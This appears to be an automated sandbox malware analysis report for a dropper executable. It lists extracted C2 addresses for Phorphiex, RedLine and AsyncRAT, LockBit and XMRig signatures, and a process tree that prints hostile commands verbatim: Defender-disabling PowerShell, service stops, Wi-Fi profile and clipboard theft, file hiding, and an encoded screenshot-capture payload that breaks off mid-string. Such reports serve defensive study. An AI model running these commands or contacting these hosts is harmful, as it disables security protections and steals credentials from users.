Resubmissions

14-11-2024 23:57

241114-3zzkpavhpf 10

14-11-2024 23:44

241114-3rj52avgna 10

14-11-2024 23:36

241114-3ln7ssvjfs 10

14-11-2024 23:24

241114-3dnajayler 10

14-11-2024 23:10

241114-25qpastqgt 10

Analysis

  • max time kernel
    1200s
  • max time network
    1149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-11-2024 23:57

General

  • Target

    4363463463464363463463463.exe

  • Size

    10KB

  • MD5

    2a94f3960c58c6e70826495f76d00b85

  • SHA1

    e2a1a5641295f5ebf01a37ac1c170ac0814bb71a

  • SHA256

    2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

  • SHA512

    fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

  • SSDEEP

    192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Malware Config

Extracted

Family

phorphiex

C2

http://185.215.113.66

Attributes
  • mutex

    Klipux

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

18.ip.gl.ply.gg:6606

18.ip.gl.ply.gg:7707

18.ip.gl.ply.gg:8808

18.ip.gl.ply.gg:9028

Mutex

lmk8StbxTzvz

Attributes
  • delay

    3

  • install

    true

  • install_file

    Discord.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • Ammyy Admin

    Remote admin tool with various capabilities.

  • AmmyyAdmin payload 1 IoCs
  • Ammyyadmin family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • FlawedAmmyy RAT

    Remote-access trojan based on leaked code for the Ammyy remote admin software.

  • Flawedammyy family
  • Lockbit

    Ransomware family with multiple variants released since late 2019.

  • Lockbit family
  • Modifies security service 2 TTPs 1 IoCs
  • Phorphiex family
  • Phorphiex payload 2 IoCs
  • Phorphiex, Phorpiex

    Phorphiex or Phorpiex Malware family which infects systems to distribute other malicious payloads such as ransomware, stealers and cryptominers.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Rule to detect Lockbit 3.0 ransomware Windows payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 8 IoCs
  • Windows security bypass 2 TTPs 6 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 1 IoCs
  • Renames multiple (600) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • XMRig Miner payload 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Stops running service(s) 4 TTPs
  • Uses browser remote debugging 2 TTPs 3 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 52 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 7 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 2 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Power Settings 1 TTPs 5 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 28 IoCs
  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 36 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 11 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Program crash 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 2 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 36 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 46 IoCs
  • Modifies Control Panel 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 48 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: LoadsDriver 64 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 19 IoCs
  • Suspicious use of SendNotifyMessage 16 IoCs
  • Suspicious use of SetWindowsHookEx 21 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3388
      • C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe
        "C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"
        2⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3544
        • C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\clsid.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4860
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
            • Accesses Microsoft Outlook profiles
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            • outlook_office_path
            • outlook_win_path
            PID:3524
        • C:\Users\Admin\AppData\Local\Temp\Files\file1.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\file1.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:3948
        • C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"
          3⤵
          • Executes dropped EXE
          • Enumerates connected drives
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of SetWindowsHookEx
          PID:4752
        • C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe
          "C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"
          3⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Drops file in Windows directory
          • Suspicious use of WriteProcessMemory
          PID:3144
          • C:\Windows\sysppvrdnvs.exe
            C:\Windows\sysppvrdnvs.exe
            4⤵
            • Modifies security service
            • Windows security bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Windows security modification
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: SetClipboardViewer
            • Suspicious use of WriteProcessMemory
            PID:4540
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2568
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3324
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1768
              • C:\Windows\SysWOW64\sc.exe
                sc stop UsoSvc
                6⤵
                • Launches sc.exe
                PID:2840
              • C:\Windows\SysWOW64\sc.exe
                sc stop WaaSMedicSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:2524
              • C:\Windows\SysWOW64\sc.exe
                sc stop wuauserv
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:3384
              • C:\Windows\SysWOW64\sc.exe
                sc stop DoSvc
                6⤵
                • Launches sc.exe
                • System Location Discovery: System Language Discovery
                PID:3760
              • C:\Windows\SysWOW64\sc.exe
                sc stop BITS /wait
                6⤵
                • Launches sc.exe
                PID:3516
            • C:\Users\Admin\AppData\Local\Temp\2537816796.exe
              C:\Users\Admin\AppData\Local\Temp\2537816796.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3576
              • C:\Users\Admin\AppData\Local\Temp\1712418979.exe
                C:\Users\Admin\AppData\Local\Temp\1712418979.exe
                6⤵
                • Executes dropped EXE
                • Drops desktop.ini file(s)
                • Sets desktop wallpaper using registry
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Modifies Control Panel
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2588
                • C:\Windows\splwow64.exe
                  C:\Windows\splwow64.exe 12288
                  7⤵
                  • Drops file in System32 directory
                  PID:5540
                • C:\ProgramData\EED1.tmp
                  "C:\ProgramData\EED1.tmp"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:1892
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C DEL /F /Q C:\PROGRA~3\EED1.tmp >> NUL
                    8⤵
                    • System Location Discovery: System Language Discovery
                    PID:2700
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 1092
                6⤵
                • Program crash
                PID:4956
            • C:\Users\Admin\AppData\Local\Temp\292098928.exe
              C:\Users\Admin\AppData\Local\Temp\292098928.exe
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:1640
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4592
                • C:\Windows\system32\reg.exe
                  reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                  7⤵
                    PID:4260
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4364
                  • C:\Windows\system32\schtasks.exe
                    schtasks /delete /f /tn "Windows Upgrade Manager"
                    7⤵
                      PID:212
                • C:\Users\Admin\AppData\Local\Temp\2751933726.exe
                  C:\Users\Admin\AppData\Local\Temp\2751933726.exe
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:6072
                • C:\Users\Admin\AppData\Local\Temp\3135025858.exe
                  C:\Users\Admin\AppData\Local\Temp\3135025858.exe
                  5⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  PID:2940
                  • C:\Users\Admin\AppData\Local\Temp\3510420815.exe
                    C:\Users\Admin\AppData\Local\Temp\3510420815.exe
                    6⤵
                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                    • Executes dropped EXE
                    PID:6016
                • C:\Users\Admin\AppData\Local\Temp\323862848.exe
                  C:\Users\Admin\AppData\Local\Temp\323862848.exe
                  5⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:2020
                  • C:\Windows\sysnldcvmr.exe
                    C:\Windows\sysnldcvmr.exe
                    6⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:4624
                    • C:\Users\Admin\AppData\Local\Temp\2563814828.exe
                      C:\Users\Admin\AppData\Local\Temp\2563814828.exe
                      7⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:1604
                    • C:\Users\Admin\AppData\Local\Temp\72403897.exe
                      C:\Users\Admin\AppData\Local\Temp\72403897.exe
                      7⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      PID:3288
                      • C:\Windows\System32\cmd.exe
                        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                        8⤵
                          PID:4020
                          • C:\Windows\system32\reg.exe
                            reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
                            9⤵
                              PID:2132
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
                            8⤵
                              PID:5136
                              • C:\Windows\system32\schtasks.exe
                                schtasks /delete /f /tn "Windows Upgrade Manager"
                                9⤵
                                  PID:1240
                            • C:\Users\Admin\AppData\Local\Temp\1094527981.exe
                              C:\Users\Admin\AppData\Local\Temp\1094527981.exe
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2568
                            • C:\Users\Admin\AppData\Local\Temp\1707518023.exe
                              C:\Users\Admin\AppData\Local\Temp\1707518023.exe
                              7⤵
                              • Executes dropped EXE
                              • System Location Discovery: System Language Discovery
                              PID:2288
                    • C:\Users\Admin\AppData\Local\Temp\Files\2020.exe
                      "C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"
                      3⤵
                      • Executes dropped EXE
                      PID:4504
                      • C:\Users\Admin\AppData\Local\Temp\Files\2020.exe
                        "C:\Users\Admin\AppData\Local\Temp\Files\2020.exe"
                        4⤵
                        • Drops startup file
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:2356
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "ver"
                          5⤵
                            PID:2520
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\_MEI45042\Blsvr.exe
                            5⤵
                              PID:2024
                              • C:\Users\Admin\AppData\Local\Temp\_MEI45042\Blsvr.exe
                                C:\Users\Admin\AppData\Local\Temp\_MEI45042\Blsvr.exe
                                6⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3968
                        • C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
                          "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
                          3⤵
                          • Executes dropped EXE
                          PID:4196
                          • C:\Users\Admin\AppData\Local\Temp\Files\stub.exe
                            "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            PID:3664
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'"
                              5⤵
                                PID:3080
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\stub.exe'
                                  6⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  PID:6056
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
                                5⤵
                                  PID:3620
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    PID:5216
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                  5⤵
                                    PID:4044
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist /FO LIST
                                      6⤵
                                      • Enumerates processes with tasklist
                                      PID:4580
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                    5⤵
                                      PID:1012
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic csproduct get uuid
                                        6⤵
                                          PID:6104
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                        5⤵
                                          PID:5828
                                          • C:\Windows\system32\reg.exe
                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                            6⤵
                                              PID:5920
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                            5⤵
                                              PID:4488
                                              • C:\Windows\system32\reg.exe
                                                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                6⤵
                                                  PID:3824
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                5⤵
                                                  PID:3456
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    6⤵
                                                    • Detects videocard installed
                                                    PID:1368
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  5⤵
                                                    PID:5620
                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                      wmic path win32_VideoController get name
                                                      6⤵
                                                      • Detects videocard installed
                                                      PID:4800
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe""
                                                    5⤵
                                                    • Hide Artifacts: Hidden Files and Directories
                                                    PID:1320
                                                    • C:\Windows\system32\attrib.exe
                                                      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Files\stub.exe"
                                                      6⤵
                                                      • Views/modifies file attributes
                                                      PID:4020
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌ .scr'"
                                                    5⤵
                                                      PID:1200
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\   ‌ .scr'
                                                        6⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        PID:3340
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                      5⤵
                                                        PID:4276
                                                        • C:\Windows\system32\tasklist.exe
                                                          tasklist /FO LIST
                                                          6⤵
                                                          • Enumerates processes with tasklist
                                                          PID:5368
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
                                                        5⤵
                                                          PID:2004
                                                          • C:\Windows\system32\reg.exe
                                                            reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                            6⤵
                                                            • Modifies registry key
                                                            PID:4576
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          5⤵
                                                            PID:1216
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist /FO LIST
                                                              6⤵
                                                              • Enumerates processes with tasklist
                                                              PID:4940
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                            5⤵
                                                              PID:4904
                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                6⤵
                                                                  PID:6064
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                5⤵
                                                                • Clipboard Data
                                                                PID:5556
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-Clipboard
                                                                  6⤵
                                                                  • Clipboard Data
                                                                  PID:1088
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                5⤵
                                                                  PID:5304
                                                                  • C:\Windows\system32\tasklist.exe
                                                                    tasklist /FO LIST
                                                                    6⤵
                                                                    • Enumerates processes with tasklist
                                                                    PID:5092
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  5⤵
                                                                    PID:5684
                                                                    • C:\Windows\system32\tree.com
                                                                      tree /A /F
                                                                      6⤵
                                                                        PID:2336
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                      5⤵
                                                                      • System Network Configuration Discovery: Wi-Fi Discovery
                                                                      PID:3784
                                                                      • C:\Windows\system32\netsh.exe
                                                                        netsh wlan show profile
                                                                        6⤵
                                                                        • Event Triggered Execution: Netsh Helper DLL
                                                                        • System Network Configuration Discovery: Wi-Fi Discovery
                                                                        PID:5860
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                      5⤵
                                                                        PID:5640
                                                                        • C:\Windows\system32\systeminfo.exe
                                                                          systeminfo
                                                                          6⤵
                                                                          • Gathers system information
                                                                          PID:5768
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                        5⤵
                                                                          PID:5972
                                                                          • C:\Windows\system32\reg.exe
                                                                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                            6⤵
                                                                              PID:5828
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBh